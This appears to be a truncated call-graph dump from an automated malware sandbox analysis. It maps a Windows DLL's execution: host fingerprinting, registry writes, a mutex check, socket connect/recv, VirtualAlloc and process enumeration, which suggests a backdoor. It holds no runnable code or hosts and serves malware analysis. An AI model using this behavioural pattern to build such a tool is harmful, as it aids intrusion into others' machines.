6d05ef05 83265->83266 83268 6d05ef60 83265->83268 83267 6d04fc5b _strftime 33 API calls 83266->83267 83267->83289 83269 6d05ef7e 83268->83269 83270 6d05c225 __wsopen_s 54 API calls 83268->83270 83271 6d05ea1e __wsopen_s 53 API calls 83269->83271 83270->83269 83272 6d05ef90 83271->83272 83273 6d05ef96 83272->83273 83274 6d05efdd 83272->83274 83277 6d05efc5 83273->83277 83278 6d05ef9e 83273->83278 83275 6d05f046 WriteFile 83274->83275 83276 6d05eff1 83274->83276 83279 6d05f068 GetLastError 83275->83279 83275->83289 83281 6d05f032 83276->83281 83282 6d05eff9 83276->83282 83280 6d05e5ef __wsopen_s 58 API calls 83277->83280 83285 6d05e9b6 __wsopen_s 6 API calls 83278->83285 83278->83289 83279->83289 83290 6d05efd8 83280->83290 83286 6d05ea9b __wsopen_s 7 API calls 83281->83286 83283 6d05f01e 83282->83283 83284 6d05effe 83282->83284 83288 6d05ec5f __wsopen_s 8 API calls 83283->83288 83287 6d05f007 83284->83287 83284->83289 83285->83289 83286->83290 83291 6d05eb76 __wsopen_s 7 API calls 83287->83291 83288->83290 83289->83258 83290->83289 83291->83289 83292->83261 83293->83261 83294->83174 83295->83175 83296->83149 83297->83151 83298->83153 83299->83155 83300 6d01d1c0 83301 6d01d1f1 83300->83301 83304 6d01d202 83300->83304 83321 6d00a450 83301->83321 83303 6d01d3b5 83305 6d01d3dc 83303->83305 83318 6d04fa98 83303->83318 83314 6d01d281 83304->83314 83316 6d01d33a 83304->83316 83333 6d01a1f0 61 API calls 3 library calls 83304->83333 83335 6d0489c0 83305->83335 83308 6d01d431 83309 6d01d275 83334 6d00a380 82 API calls 2 library calls 83309->83334 83311 6d01d394 83311->83303 83313 6d01d3a5 CertCloseStore 83311->83313 83312 6d04fa98 std::locale::_Locimp::~_Locimp 17 API calls 83312->83311 83313->83303 83315 6d00a450 82 API calls 83314->83315 83314->83316 83315->83316 83316->83303 83316->83311 83316->83312 83319 6d05f802 ___free_lconv_mon 17 API calls 83318->83319 83320 6d04fab0 83319->83320 83320->83305 83322 6d00a470 83321->83322 83323 6d00a4ba 83321->83323 83322->83323 83342 6d018f60 55 API calls 83322->83342 83324 6d0489c0 CatchGuardHandler 5 API calls 83323->83324 83326 6d00a4cc 83324->83326 83326->83304 83327 6d00a497 83328 6d00a4d3 83327->83328 83329 6d00a4a7 83327->83329 83344 6d04970d 5 API calls std::_Locinfo::_Locinfo_dtor 83328->83344 83343 6d00a2e0 80 API calls 83329->83343 83332 6d00a4d8 83333->83309 83334->83314 83336 6d0489c8 83335->83336 83337 6d0489c9 IsProcessorFeaturePresent 83335->83337 83336->83308 83339 6d049627 83337->83339 83345 6d0495ea SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 83339->83345 83341 6d04970a 83341->83308 83342->83327 83343->83323 83344->83332 83345->83341 83346 4eb0009 83349 4efe000 83346->83349 83356 4efe216 83349->83356 83351 4efe0c7 83352 4eb0015 83351->83352 83363 4eb3f46 83351->83363 83353 4efe00f 83353->83351 83353->83352 83359 4efe14d 83353->83359 83369 4efe3ad GetPEB 83356->83369 83358 4efe222 83358->83353 83362 4efe16a 83359->83362 83360 4efe15d LoadLibraryA 83361 4efe1a0 83360->83361 83360->83362 83361->83351 83362->83360 83362->83361 83364 4eb3f51 83363->83364 83365 4eb3f56 83363->83365 83383 4eba4bf GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 83364->83383 83371 4eb3e50 83365->83371 83368 4eb3f64 83368->83352 83370 4efe3c0 83369->83370 83370->83358 83372 4eb3e5c __tzset_nolock 83371->83372 83373 4eb3ea9 83372->83373 83376 4eb3ef9 __tzset_nolock 83372->83376 83384 4eb3cec 83372->83384 83373->83376 83436 4ec8060 83373->83436 83376->83368 83378 4ec8060 ___DllMainCRTStartup 371 API calls 83380 4eb3ed0 83378->83380 83379 4eb3cec __CRT_INIT@12 149 API calls 83379->83376 83381 4eb3cec __CRT_INIT@12 149 API calls 83380->83381 83382 4eb3ed9 83381->83382 83382->83376 83382->83379 83383->83365 83385 4eb3cf8 __tzset_nolock 83384->83385 83386 4eb3d7a 83385->83386 83387 4eb3d00 83385->83387 83389 4eb3ddb 83386->83389 83390 4eb3d80 83386->83390 83440 4eb7925 HeapCreate 83387->83440 83391 4eb3de0 83389->83391 83395 4eb3e39 83389->83395 83400 4eb3d9e 83390->83400 83404 4eb3d09 __tzset_nolock 83390->83404 83450 4eb78f8 66 API calls _doexit 83390->83450 83455 4eb469a TlsGetValue 83391->83455 83392 4eb3d05 83394 4eb3d10 83392->83394 83392->83404 83441 4eb49ef 86 API calls 5 library calls 83394->83441 83395->83404 83461 4eb4981 79 API calls __freefls@4 83395->83461 83401 4eb3db2 83400->83401 83451 4eb6a59 67 API calls _free 83400->83451 83454 4eb3dc5 70 API calls __mtterm 83401->83454 83403 4eb3d15 __RTC_Initialize 83408 4eb3d19 83403->83408 83415 4eb3d25 GetCommandLineA 83403->83415 83404->83373 83407 4eb3df1 83407->83404 83410 4eb3dfd DecodePointer 83407->83410 83442 4eb7943 HeapDestroy 83408->83442 83409 4eb3da8 83452 4eb46ce 70 API calls _free 83409->83452 83416 4eb3e12 83410->83416 83413 4eb3d1e 83413->83404 83414 4eb3dad 83453 4eb7943 HeapDestroy 83414->83453 83443 4eba272 71 API calls 2 library calls 83415->83443 83419 4eb3e2d 83416->83419 83420 4eb3e16 83416->83420 83460 4eb364a 66 API calls 2 library calls 83419->83460 83459 4eb470b 66 API calls 4 library calls 83420->83459 83421 4eb3d35 83444 4eb6814 73 API calls __calloc_crt 83421->83444 83425 4eb3e1d GetCurrentThreadId 83425->83404 83426 4eb3d3f 83427 4eb3d43 83426->83427 83446 4eba1b7 95 API calls 3 library calls 83426->83446 83445 4eb46ce 70 API calls _free 83427->83445 83430 4eb3d4f 83431 4eb3d63 83430->83431 83447 4eb9f41 94 API calls 6 library calls 83430->83447 83431->83413 83449 4eb6a59 67 API calls _free 83431->83449 83434 4eb3d58 83434->83431 83448 4eb770b 77 API calls 4 library calls 83434->83448 83437 4ec8069 DisableThreadLibraryCalls 83436->83437 83438 4eb3ebc 83436->83438 83462 4ec48a0 83437->83462 83438->83378 83438->83382 83440->83392 83441->83403 83442->83413 83443->83421 83444->83426 83445->83408 83446->83430 83447->83434 83448->83431 83449->83427 83450->83400 83451->83409 83452->83414 83453->83401 83454->83404 83456 4eb3de5 83455->83456 83457 4eb46af DecodePointer TlsSetValue 83455->83457 83458 4eb7540 66 API calls __calloc_crt 83456->83458 83457->83456 83458->83407 83459->83425 83460->83413 83461->83404 83505 4ec5140 83462->83505 83466 4ec48cb 83467 4ec48e5 83466->83467 83468 4ec48d2 OutputDebugStringA ExitProcess 83466->83468 83525 4eb2103 83467->83525 83471 4ec491b _memset 83537 4eb37f2 83471->83537 83476 4eb39f6 ___DllMainCRTStartup 85 API calls 83477 4ec496d 83476->83477 83478 4ec49ca 83477->83478 83563 4ec4b70 7 API calls 83477->83563 83480 4ec5140 ___DllMainCRTStartup 20 API calls 83478->83480 83481 4ec49d7 lstrlenA 83480->83481 83482 4ec4a54 CreateMutexA GetLastError 83481->83482 83483 4ec49e2 83481->83483 83484 4ec4a6f ExitProcess 83482->83484 83485 4ec4a77 83482->83485 83571 4eb27aa GetSystemTimeAsFileTime 83483->83571 83588 4ec3e10 83485->83588 83487 4ec49ee 83573 4eb3cc5 83487->83573 83490 4ec4a7c 83600 4ec6880 83490->83600 83491 4ec49fa _memset 83494 4ec4a14 wsprintfA 83491->83494 83578 4ec5070 83494->83578 83495 4ec4a87 CreateThread WaitForSingleObject CloseHandle 83497 4ec5140 ___DllMainCRTStartup 20 API calls 83495->83497 83936 4ec4520 83495->83936 83503 4ec4ab3 83497->83503 83498 4ec4b3a CoUninitialize 83619 4eb21eb 83498->83619 83499 4ec4b2d ctype 83499->83498 83501 4ec4b4d 83501->83438 83503->83499 83504 4ec4b0c wsprintfA 83503->83504 83618 4ec3c90 69 API calls 3 library calls 83503->83618 83504->83495 83504->83499 83506 4ec5164 _memset 83505->83506 83507 4ec517e GetComputerNameA 83506->83507 83508 4ec51b5 _memset 83507->83508 83509 4ec51a3 lstrcpyA 83507->83509 83510 4ec51c8 wsprintfA 83508->83510 83509->83508 83511 4ec4d60 ___DllMainCRTStartup 17 API calls 83510->83511 83512 4ec51fe 83511->83512 83513 4eb21eb __atodbl_l 5 API calls 83512->83513 83514 4ec48c0 83513->83514 83515 4eb39f6 83514->83515 83516 4eb3a26 83515->83516 83517 4eb3a05 83515->83517 83631 4eb3936 85 API calls 5 library calls 83516->83631 83517->83516 83519 4eb3a0a 83517->83519 83627 4eb5c8c 83519->83627 83521 4eb3a38 83521->83466 83524 4eb3a1a 83524->83466 83527 4eb29fe 83525->83527 83528 4eb2a22 GetModuleFileNameA 83527->83528 83533 4eb2a24 std::exception::exception 83527->83533 83650 4eb375e 83527->83650 83667 4eb5fca DecodePointer 83527->83667 83528->83471 83530 4eb2a62 83669 4eb29d9 66 API calls std::exception::operator= 83530->83669 83532 4eb2a6c 83670 4eb3f69 RaiseException 83532->83670 83533->83530 83668 4eb34d7 76 API calls __cinit 83533->83668 83536 4eb2a7d 83538 4eb3810 83537->83538 83539 4eb3825 83537->83539 83541 4eb5c8c _write_string 66 API calls 83538->83541 83539->83538 83540 4eb382c 83539->83540 83677 4eb4f04 83540->83677 83543 4eb3815 83541->83543 83676 4eb5c3a 11 API calls __tsopen_nolock 83543->83676 83545 4eb3852 83546 4eb3820 83545->83546 83703 4eb7b65 83545->83703 83548 4ec4d60 83546->83548 83549 4ec4dcb _memset 83548->83549 83550 4ec4df1 7 API calls 83549->83550 83551 4ec4e85 83550->83551 83554 4ec4e76 ___DllMainCRTStartup 83550->83554 83552 4ec4e99 RegQueryValueExA 83551->83552 83551->83554 83555 4ec4f67 83551->83555 83562 4ec4ee6 __mbschr_l ___DllMainCRTStartup 83551->83562 83553 4ec4ecd lstrcpyA 83552->83553 83552->83554 83553->83554 83556 4ec5009 83554->83556 83557 4ec5002 FreeLibrary 83554->83557 83555->83554 83559 4ec4fd8 wsprintfA 83555->83559 83558 4eb21eb __atodbl_l 5 API calls 83556->83558 83557->83556 83560 4ec4966 83558->83560 83559->83554 83560->83476 83560->83477 83561 4ec4f4e lstrcpyA 83561->83554 83562->83554 83562->83561 83564 4ec4c13 83563->83564 83570 4ec4c79 ___DllMainCRTStartup 83563->83570 83565 4ec4c1a RegCreateKeyExA 83564->83565 83566 4ec4c42 RegOpenKeyExA 83564->83566 83564->83570 83565->83566 83565->83570 83567 4ec4c5b lstrlenA RegSetValueExA 83566->83567 83566->83570 83567->83570 83568 4ec4cde FreeLibrary 83569 4ec4ce5 83568->83569 83569->83478 83570->83568 83570->83569 83572 4eb27da __aulldiv 83571->83572 83572->83487 83773 4eb93d2 83573->83773 83575 4eb3cd0 83576 4eb3cdf 83575->83576 83781 4eb3a3d 83575->83781 83576->83491 83909 4eb72f0 83578->83909 83581 4ec50d4 _memset 83583 4ec50e7 wsprintfA lstrlenA 83581->83583 83582 4ec50c2 lstrcpyA 83582->83581 83584 4ec4b70 ___DllMainCRTStartup 12 API calls 83583->83584 83585 4ec5120 83584->83585 83586 4eb21eb __atodbl_l 5 API calls 83585->83586 83587 4ec5132 83586->83587 83587->83482 83911 4eb29fe 83588->83911 83591 4ec5140 ___DllMainCRTStartup 20 API calls 83592 4ec3e35 83591->83592 83592->83592 83593 4ec3e9d 83592->83593 83923 4ec3c90 69 API calls 3 library calls 83592->83923 83595 4ec3ec4 lstrcpyA 83593->83595 83596 4ec3ea6 lstrcpyA 83593->83596 83595->83490 83596->83490 83597 4ec3e5e 83597->83593 83598 4ec3e68 wsprintfA 83597->83598 83598->83490 83601 4ec5140 ___DllMainCRTStartup 20 API calls 83600->83601 83602 4ec689e 83601->83602 83603 4ec69ce 83602->83603 83604 4ec68b2 _memset 83602->83604 83605 4eb21eb __atodbl_l 5 API calls 83603->83605 83607 4ec68cb GetModuleFileNameA 83604->83607 83606 4ec4a84 83605->83606 83606->83495 83608 4ec68f0 _strrchr 83607->83608 83928 4eb31c7 83608->83928 83610 4ec69bc Sleep 83610->83603 83611 4ec6911 wsprintfA 83933 4ec5960 155 API calls 4 library calls 83611->83933 83613 4eb31c7 _strtok 66 API calls 83616 4ec68fe ___DllMainCRTStartup 83613->83616 83614 4eb29fe ___DllMainCRTStartup 77 API calls 83614->83616 83615 4ec69ba 83615->83610 83616->83610 83616->83611 83616->83613 83616->83614 83616->83615 83617 4ec696b CreateThread CloseHandle 83616->83617 83617->83616 83934 4ec6200 152 API calls 5 library calls 83617->83934 83618->83503 83620 4eb21f3 83619->83620 83621 4eb21f5 IsDebuggerPresent 83619->83621 83620->83501 83935 4eba55a 83621->83935 83624 4eb4082 SetUnhandledExceptionFilter UnhandledExceptionFilter 83625 4eb409f __call_reportfault 83624->83625 83626 4eb40a7 GetCurrentProcess TerminateProcess 83624->83626 83625->83626 83626->83501 83632 4eb47bf GetLastError 83627->83632 83629 4eb3a0f 83630 4eb5c3a 11 API calls __tsopen_nolock 83629->83630 83630->83524 83631->83521 83633 4eb469a ___set_flsgetvalue 3 API calls 83632->83633 83634 4eb47d6 83633->83634 83635 4eb47de 83634->83635 83636 4eb482c SetLastError 83634->83636 83647 4eb7540 66 API calls __calloc_crt 83635->83647 83636->83629 83638 4eb47ea 83638->83636 83639 4eb47f2 DecodePointer 83638->83639 83640 4eb4807 83639->83640 83641 4eb480b 83640->83641 83642 4eb4823 83640->83642 83648 4eb470b 66 API calls 4 library calls 83641->83648 83649 4eb364a 66 API calls 2 library calls 83642->83649 83645 4eb4813 GetCurrentThreadId 83645->83636 83646 4eb4829 83646->83636 83647->83638 83648->83645 83649->83646 83651 4eb37db 83650->83651 83659 4eb376c 83650->83659 83675 4eb5fca DecodePointer 83651->83675 83653 4eb37e1 83654 4eb5c8c _write_string 65 API calls 83653->83654 83666 4eb37d3 83654->83666 83656 4eb379a RtlAllocateHeap 83656->83659 83656->83666 83658 4eb3777 83658->83659 83671 4eb7b2c 66 API calls 2 library calls 83658->83671 83672 4eb797d 66 API calls 7 library calls 83658->83672 83673 4eb768a GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83658->83673 83659->83656 83659->83658 83660 4eb37c7 83659->83660 83664 4eb37c5 83659->83664 83674 4eb5fca DecodePointer 83659->83674 83663 4eb5c8c _write_string 65 API calls 83660->83663 83663->83664 83665 4eb5c8c _write_string 65 API calls 83664->83665 83665->83666 83666->83527 83667->83527 83668->83530 83669->83532 83670->83536 83671->83658 83672->83658 83674->83659 83675->83653 83676->83546 83724 4eb3876 83677->83724 83680 4eb4f6f 83681 4eb5c8c _write_string 66 API calls 83680->83681 83682 4eb4f74 83681->83682 83732 4eb5c3a 11 API calls __tsopen_nolock 83682->83732 83685 4eb4f7f 83686 4eb21eb __atodbl_l 5 API calls 83685->83686 83687 4eb5a8b 83686->83687 83687->83545 83690 4eb530c 83691 4eb55fb DecodePointer 83690->83691 83699 4eb5349 83690->83699 83741 4eb74fb 83690->83741 83694 4eb564a 83691->83694 83692 4eb4e5d 97 API calls _write_string 83698 4eb4fa6 __output_l __aulldvrm _strlen 83692->83698 83693 4ebb355 78 API calls __cftof 83693->83698 83696 4eb5676 83694->83696 83700 4eb5664 DecodePointer 83694->83700 83697 4eb5697 83696->83697 83701 4eb5685 DecodePointer 83696->83701 83697->83545 83698->83680 83698->83685 83698->83690 83698->83692 83698->83693 83702 4eb4e90 97 API calls _write_string 83698->83702 83740 4ebb372 76 API calls _LocaleUpdate::_LocaleUpdate 83698->83740 83747 4eb364a 66 API calls 2 library calls 83698->83747 83699->83691 83700->83696 83701->83697 83702->83698 83704 4eb665b __fseek_nolock 66 API calls 83703->83704 83705 4eb7b75 83704->83705 83706 4eb7b80 83705->83706 83707 4eb7b97 83705->83707 83708 4eb5c8c _write_string 66 API calls 83706->83708 83709 4eb7b9b 83707->83709 83718 4eb7ba8 __stbuf 83707->83718 83717 4eb7b85 83708->83717 83710 4eb5c8c _write_string 66 API calls 83709->83710 83710->83717 83711 4eb7c09 83712 4eb7c98 83711->83712 83713 4eb7c18 83711->83713 83771 4eb9b06 97 API calls 6 library calls 83712->83771 83715 4eb7c2f 83713->83715 83721 4eb7c4c 83713->83721 83769 4eb9b06 97 API calls 6 library calls 83715->83769 83717->83546 83718->83711 83718->83717 83720 4eb7bfe 83718->83720 83760 4ebb187 83718->83760 83720->83711 83757 4ebc72f 83720->83757 83721->83717 83770 4ebc7fd 71 API calls 6 library calls 83721->83770 83725 4eb3889 83724->83725 83726 4eb38d6 83724->83726 83748 4eb4838 83725->83748 83726->83680 83726->83698 83733 4eb665b 83726->83733 83729 4eb38b6 83729->83726 83754 4eb7eec 68 API calls 6 library calls 83729->83754 83732->83685 83734 4eb667c 83733->83734 83735 4eb6667 83733->83735 83734->83698 83736 4eb5c8c _write_string 66 API calls 83735->83736 83737 4eb666c 83736->83737 83756 4eb5c3a 11 API calls __tsopen_nolock 83737->83756 83739 4eb6677 83739->83698 83740->83698 83744 4eb7504 83741->83744 83742 4eb375e _malloc 65 API calls 83742->83744 83743 4eb753a 83743->83699 83744->83742 83744->83743 83745 4eb751b Sleep 83744->83745 83746 4eb7530 83745->83746 83746->83743 83746->83744 83747->83698 83749 4eb47bf __getptd_noexit 66 API calls 83748->83749 83750 4eb4840 83749->83750 83751 4eb388e 83750->83751 83755 4eb7907 66 API calls 3 library calls 83750->83755 83751->83729 83753 4eb866d 74 API calls 6 library calls 83751->83753 83753->83729 83754->83726 83756->83739 83758 4eb74fb __malloc_crt 66 API calls 83757->83758 83759 4ebc744 83758->83759 83759->83711 83761 4ebb1a3 83760->83761 83762 4ebb194 83760->83762 83764 4ebb1c1 83761->83764 83765 4eb5c8c _write_string 66 API calls 83761->83765 83763 4eb5c8c _write_string 66 API calls 83762->83763 83766 4ebb199 83763->83766 83764->83720 83767 4ebb1b4 83765->83767 83766->83720 83772 4eb5c3a 11 API calls __tsopen_nolock 83767->83772 83769->83717 83770->83717 83771->83717 83772->83766 83774 4eb47bf __getptd_noexit 66 API calls 83773->83774 83775 4eb93da 83774->83775 83776 4eb93e0 83775->83776 83778 4eb9404 83775->83778 83780 4eb74fb __malloc_crt 66 API calls 83775->83780 83777 4eb5c8c _write_string 66 API calls 83776->83777 83776->83778 83779 4eb93e5 83777->83779 83778->83575 83779->83575 83780->83776 83782 4eb3a59 83781->83782 83783 4eb3a6c _memset 83781->83783 83784 4eb5c8c _write_string 66 API calls 83782->83784 83786 4eb3a84 83783->83786 83794 4eb3a95 83783->83794 83785 4eb3a5e 83784->83785 83840 4eb5c3a 11 API calls __tsopen_nolock 83785->83840 83788 4eb5c8c _write_string 66 API calls 83786->83788 83789 4eb3a89 83788->83789 83841 4eb5c3a 11 API calls __tsopen_nolock 83789->83841 83790 4eb3ab3 83795 4eb5c8c _write_string 66 API calls 83790->83795 83791 4eb3ac4 83822 4eb8f08 83791->83822 83794->83790 83794->83791 83797 4eb3a68 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 83795->83797 83796 4eb3ac9 83830 4eb91d1 83796->83830 83797->83576 83799 4eb3ad2 83800 4eb3cba 83799->83800 83842 4eb91fe 66 API calls 2 library calls 83799->83842 83837 4eb5be8 83800->83837 83803 4eb3cc4 83805 4eb93d2 __localtime64 66 API calls 83803->83805 83804 4eb3ae4 83804->83800 83843 4eb922b 83804->83843 83807 4eb3cd0 83805->83807 83809 4eb3cdf 83807->83809 83811 4eb3a3d __localtime64_s 102 API calls 83807->83811 83808 4eb3af6 83808->83800 83810 4eb3aff 83808->83810 83809->83576 83812 4eb3b72 83810->83812 83814 4eb3b12 83810->83814 83811->83809 83853 4eb8f98 66 API calls 5 library calls 83812->83853 83850 4eb8f98 66 API calls 5 library calls 83814->83850 83816 4eb3b79 83816->83797 83854 4eb8f57 66 API calls 4 library calls 83816->83854 83817 4eb3b2a 83817->83797 83851 4eb8f57 66 API calls 4 library calls 83817->83851 83820 4eb3b3f 83820->83797 83852 4eb8f98 66 API calls 5 library calls 83820->83852 83824 4eb8f14 __tzset_nolock 83822->83824 83823 4eb8f48 __tzset_nolock 83823->83796 83824->83823 83855 4ebb0b8 83824->83855 83826 4eb8f25 83827 4eb8f36 83826->83827 83862 4eb8827 83826->83862 83891 4eb8f4e LeaveCriticalSection _doexit 83827->83891 83831 4eb91dd 83830->83831 83832 4eb91f2 83830->83832 83833 4eb5c8c _write_string 66 API calls 83831->83833 83832->83799 83834 4eb91e2 83833->83834 83901 4eb5c3a 11 API calls __tsopen_nolock 83834->83901 83836 4eb91ed 83836->83799 83902 4eb5abf 83837->83902 83840->83797 83841->83797 83842->83804 83844 4eb924c 83843->83844 83845 4eb9237 83843->83845 83844->83808 83846 4eb5c8c _write_string 66 API calls 83845->83846 83847 4eb923c 83846->83847 83908 4eb5c3a 11 API calls __tsopen_nolock 83847->83908 83849 4eb9247 83849->83808 83850->83817 83851->83820 83852->83797 83853->83816 83854->83797 83856 4ebb0cd 83855->83856 83857 4ebb0e0 EnterCriticalSection 83855->83857 83892 4ebaff6 66 API calls 9 library calls 83856->83892 83857->83826 83859 4ebb0d3 83859->83857 83893 4eb7907 66 API calls 3 library calls 83859->83893 83863 4eb8833 __tzset_nolock 83862->83863 83864 4ebb0b8 __lock 66 API calls 83863->83864 83865 4eb884e __tzset_nolock 83864->83865 83866 4eb922b __tzset_nolock 66 API calls 83865->83866 83867 4eb8863 83866->83867 83868 4eb91d1 __tzset_nolock 66 API calls 83867->83868 83889 4eb8920 __tzset_nolock 83867->83889 83870 4eb8875 83868->83870 83869 4eb5be8 __invoke_watson 10 API calls 83869->83889 83870->83889 83894 4eb91fe 66 API calls 2 library calls 83870->83894 83871 4eb894b GetTimeZoneInformation 83871->83889 83874 4eb8887 83874->83889 83895 4ebd9be 74 API calls 2 library calls 83874->83895 83876 4eb89b2 WideCharToMultiByte 83876->83889 83877 4eb8895 83896 4ebdc06 99 API calls 3 library calls 83877->83896 83879 4eb89ea WideCharToMultiByte 83879->83889 83881 4eb88ee _strlen 83883 4eb74fb __malloc_crt 66 API calls 83881->83883 83882 4ebda36 66 API calls __tzset_nolock 83882->83889 83886 4eb88fc _strlen 83883->83886 83884 4eb88b7 __tzset_nolock 83884->83881 83884->83889 83897 4eb364a 66 API calls 2 library calls 83884->83897 83886->83889 83898 4eb5ecf 66 API calls 2 library calls 83886->83898 83888 4eb8b1b __tzset_nolock 83888->83827 83889->83869 83889->83871 83889->83876 83889->83879 83889->83882 83889->83888 83890 4ebdbf0 79 API calls __tzset_nolock 83889->83890 83899 4eb364a 66 API calls 2 library calls 83889->83899 83900 4eb8aaa LeaveCriticalSection _doexit 83889->83900 83890->83889 83891->83823 83892->83859 83894->83874 83895->83877 83896->83884 83897->83881 83898->83889 83899->83889 83900->83889 83901->83836 83903 4eb5ade _memset __call_reportfault 83902->83903 83904 4eb5afc IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 83903->83904 83905 4eb5bca __call_reportfault 83904->83905 83906 4eb21eb __atodbl_l 5 API calls 83905->83906 83907 4eb5be6 GetCurrentProcess TerminateProcess 83906->83907 83907->83803 83908->83849 83910 4eb72fc GetComputerNameA 83909->83910 83910->83581 83910->83582 83913 4eb2a08 83911->83913 83912 4eb375e _malloc 66 API calls 83912->83913 83913->83912 83914 4eb2a22 83913->83914 83916 4eb2a24 std::exception::exception 83913->83916 83924 4eb5fca DecodePointer 83913->83924 83914->83591 83921 4eb2a62 83916->83921 83925 4eb34d7 76 API calls __cinit 83916->83925 83918 4eb2a6c 83927 4eb3f69 RaiseException 83918->83927 83926 4eb29d9 66 API calls std::exception::operator= 83921->83926 83922 4eb2a7d 83923->83597 83924->83913 83925->83921 83926->83918 83927->83922 83929 4eb4838 __getptd 66 API calls 83928->83929 83930 4eb31ea 83929->83930 83931 4eb21eb __atodbl_l 5 API calls 83930->83931 83932 4eb3282 83931->83932 83932->83616 83933->83616 83935->83624 83937 4ec453f __write_nolock 83936->83937 83965 4ec7460 WSAStartup InitializeCriticalSection CreateEventA 83937->83965 83940 4ec486c 84065 4ec73b0 13 API calls 83940->84065 83942 4ec4875 83943 4eb21eb __atodbl_l 5 API calls 83942->83943 83945 4ec4895 83943->83945 83946 4ec45d0 CreateEventA 83948 4ec4647 GetTickCount GetTickCount 83946->83948 83953 4ec4596 _memset _strncpy 83946->83953 83947 4ec45c0 Sleep 83949 4ec485c GetTickCount 83947->83949 83989 4ec41e0 83948->83989 83949->83940 83949->83953 83953->83940 83953->83946 83953->83947 83953->83948 83972 4ec7b90 83953->83972 83966 4eb27aa __time64 GetSystemTimeAsFileTime 83965->83966 83967 4ec74f1 83966->83967 84066 4eb2777 83967->84066 83970 4eb21eb __atodbl_l 5 API calls 83971 4ec4575 GetTickCount 83970->83971 83971->83940 83971->83953 84069 4ec7200 setsockopt CancelIo InterlockedExchange closesocket SetEvent 83972->84069 83974 4ec7bac ResetEvent socket 83975 4ec7bec gethostbyname 83974->83975 83976 4ec7bd7 83974->83976 83975->83976 83978 4ec7bf9 htons inet_ntoa 83975->83978 83977 4eb21eb __atodbl_l 5 API calls 83976->83977 83979 4ec7be6 83977->83979 84070 4eb27fb 83978->84070 83979->83953 83981 4ec7c2e connect 83981->83976 83982 4ec7c49 getsockname 83981->83982 83983 4eb72f0 _memset 83982->83983 83984 4ec7c83 inet_ntoa wsprintfA setsockopt 83983->83984 83985 4ec7cbd WSAIoctl 83984->83985 83986 4ec7cee CreateThread 83984->83986 83985->83986 83987 4eb21eb __atodbl_l 5 API calls 83986->83987 84102 4ec79e0 83986->84102 83988 4ec7d1e 83987->83988 83988->83953 83990 4ec4229 _memset _strncpy 83989->83990 83991 4ec4246 inet_addr 83990->83991 83992 4ec5140 ___DllMainCRTStartup 20 API calls 83991->83992 83993 4ec4263 83992->83993 83994 4ec4275 gethostname 83993->83994 83995 4ec4284 _strncpy 83993->83995 83994->83995 84156 4ec3970 83995->84156 83998 4ec42d4 83999 4ec42eb 83998->83999 84000 4ec42e4 FreeLibrary 83998->84000 84162 4ec3840 6 API calls 83999->84162 84000->83999 84065->83942 84067 4eb4838 __getptd 66 API calls 84066->84067 84068 4eb2781 84067->84068 84068->83970 84069->83974 84071 4eb2807 __tzset_nolock 84070->84071 84072 4eb282a __stbuf 84071->84072 84073 4eb2815 84071->84073 84087 4eb4cf0 84072->84087 84074 4eb5c8c _write_string 66 API calls 84073->84074 84075 4eb281a 84074->84075 84099 4eb5c3a 11 API calls __tsopen_nolock 84075->84099 84078 4eb283c __stbuf 84092 4eb4d8d 84078->84092 84079 4eb2825 __tzset_nolock 84079->83981 84081 4eb284e __stbuf 84082 4eb4f04 __output_l 102 API calls 84081->84082 84083 4eb2866 __stbuf 84082->84083 84100 4eb4e29 97 API calls __flush 84083->84100 84085 4eb2877 84101 4eb288f LeaveCriticalSection LeaveCriticalSection __stbuf __getstream 84085->84101 84088 4eb4cfd 84087->84088 84089 4eb4d13 EnterCriticalSection 84087->84089 84090 4ebb0b8 __lock 66 API calls 84088->84090 84089->84078 84091 4eb4d06 84090->84091 84091->84078 84093 4eb665b __fseek_nolock 66 API calls 84092->84093 84094 4eb4d9c 84093->84094 84095 4ebb187 __stbuf 66 API calls 84094->84095 84096 4eb4da2 __stbuf 84095->84096 84097 4eb4def 84096->84097 84098 4eb74fb __malloc_crt 66 API calls 84096->84098 84097->84081 84098->84097 84099->84079 84100->84085 84101->84079 84103 4ec79ed _memset __write_nolock 84102->84103 84104 4ec7a10 select 84103->84104 84109 4ec7aa9 84103->84109 84110 4ec7a6a recv 84103->84110 84113 4ec7770 84103->84113 84104->84103 84106 4ec7aae setsockopt CancelIo InterlockedExchange closesocket 84104->84106 84105 4eb21eb __atodbl_l 5 API calls 84107 4ec7b84 84105->84107 84108 4ec7b64 SetEvent 84106->84108 84108->84109 84109->84105 84110->84103 84111 4ec7b0a setsockopt CancelIo InterlockedExchange closesocket 84110->84111 84111->84108 84114 4ec77c9 84113->84114 84132 4ec7eb0 84114->84132 84116 4ec7899 84118 4ec7979 84127 4ec7f90 70 API calls 84131 4ec77d7 _memcpy_s ___DllMainCRTStartup 84127->84131 84129 4ec78f0 VirtualFree 84129->84131 84130 4ec7eb0 70 API calls 84130->84131 84131->84116 84131->84118 84131->84127 84131->84129 84131->84130 84141 4ec7f90 84131->84141 84150 4ec7300 84131->84150 84133 4ec7ec8 84132->84133 84134 4ec7ec0 84132->84134 84135 4eb2580 __floor_pentium4 68 API calls 84133->84135 84134->84131 84136 4ec7eeb VirtualAlloc 84135->84136 84157 4eb72f0 _memset 84156->84157 84158 4ec3996 GetVersionExA 84157->84158 84159 4ec39bb _strncpy 84158->84159 84160 4eb21eb __atodbl_l 5 API calls 84159->84160 84161 4ec3ae0 LoadLibraryA GetProcAddress GetProcAddress 84160->84161 84161->83998 84163 4ec392c 84162->84163 84164 4eb21eb __atodbl_l 5 API calls 84163->84164 84165 4ec395d 84164->84165 84166 4ec3fc0 84165->84166 84167 4ec3fd8 _memset 84166->84167 84168 4ec404b 84167->84168 84172 4ec4005 lstrcatA lstrcatA 84167->84172 84192 4ec34f0 CreateToolhelp32Snapshot 84167->84192 84170 4ec4061 lstrcatA 84168->84170 84171 4ec4071 84168->84171 84170->84171 84171->84171 84205 4eb1e50 84171->84205 84172->84167 84193 4eb29fe ___DllMainCRTStartup 77 API calls 84192->84193 84194 4ec3513 84193->84194 84195 4ec351c 84194->84195 84196 4ec3522 Process32First 84194->84196 84195->84167 84206 4eb1ea2 84205->84206 84209 4eb1e57 84205->84209 84209->84206 84211 